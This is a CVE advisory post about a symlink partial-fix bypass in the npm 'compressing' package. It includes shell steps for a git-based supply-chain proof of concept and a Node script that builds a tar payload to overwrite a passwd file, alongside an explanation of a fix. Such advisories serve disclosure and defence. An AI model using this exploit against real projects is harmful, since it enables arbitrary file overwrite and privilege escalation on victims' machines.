npm package compressing, Partial Fix Bypass, CVE-2026-24884 (critical)

Listen to this Post

How CVE-2026-24884 Works

The vulnerability is a Partial Fix Bypass of CVE-2026-24884 in the `compressing` npm package (tested on v2.1.0). The library’s `isPathWithinParent()` utility uses `path.resolve(childPath)` to validate paths – a purely logical string operation that does not check the actual filesystem state. If the extraction target is `/app/out` and an entry is config/passwd, `path.resolve` returns /app/out/config/passwd. Since this string starts with /app/out/, the check returns TRUE. However, if an attacker has pre‑planted a symbolic link on disk at `/app/out/config` pointing to /etc, the OS kernel follows the link when the library calls fs.writeFile('/app/out/config/passwd', data). The OS resolves the path to /etc/passwd, while the library believes it is writing inside the safe directory. This “Logical vs. Physical” divergence allows arbitrary file writes outside the intended extraction root. Git natively preserves symlinks during clone, making supply‑chain attacks trivial: a victim only needs to run `git clone` and node app.js.

dailycve form

Platform: npm package
Version: 2.1.0
Vulnerability : Partial fix bypass
Severity: Critical
date: 2026-04-17

Prediction: Not yet patched

Analytics under heading What Undercode Say:

Workspace setup
mkdir -p ~/poc-workspace
cd ~/poc-workspace
mkdir -p /tmp/fake_root/etc
echo "root:SAFE_DATA_DO_NOT_OVERWRITE" > /tmp/fake_root/etc/passwd
npm install [email protected] tar-stream
Create poisoned symlink
mkdir compressing_poc_test && cd compressing_poc_test
git init
ln -s /tmp/fake_root/etc/passwd config_file
git branch -M main
git remote add origin https://github.com/USERNAME/compressing_poc_test.git
Generate payload.tar
node gen_payload.js see Exploit section
mv ../payload.tar .
git add . && git commit -m "Add payload" && git push -u origin main
Victim clones and runs
cd ~/poc-workspace
git clone https://github.com/USERNAME/compressing_poc_test.git victim_app
cd victim_app
node victim_app.js triggers the overwrite

Exploit:

const tar = require('tar-stream');
const fs = require('fs');
const pack = tar.pack();
// PAYLOAD: A plain file that matches the symlink name
pack.entry({ name: 'config_file' }, 'root:PWNED_BY_THE_SUPPLY_CHAIN_ATTACK_V2.1.0\n');
pack.finalize();
pack.pipe(fs.createWriteStream('./payload.tar'));
console.log('payload.tar generated successfully!');

Protection from this CVE

Replace the string‑based validation with state‑aware recursive checks using fs.lstatSync. The secure `secureIsPathWithinParent()` function iterates through every segment of the path on disk. If any component is a symbolic link, it throws a security exception before `fs.writeFile` can follow the link. This ensures the logical path and the physical path are identical, closing the divergence that the exploit relies on.

Impact:

  • Arbitrary file overwrite outside the extraction root
  • Privilege escalation (overwrite `/etc/passwd` or /etc/shadow)
  • Remote code execution (overwrite binaries or startup scripts)
  • Data corruption and permanent data loss
  • Supply‑chain compromise via Git clone with zero victim interaction

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top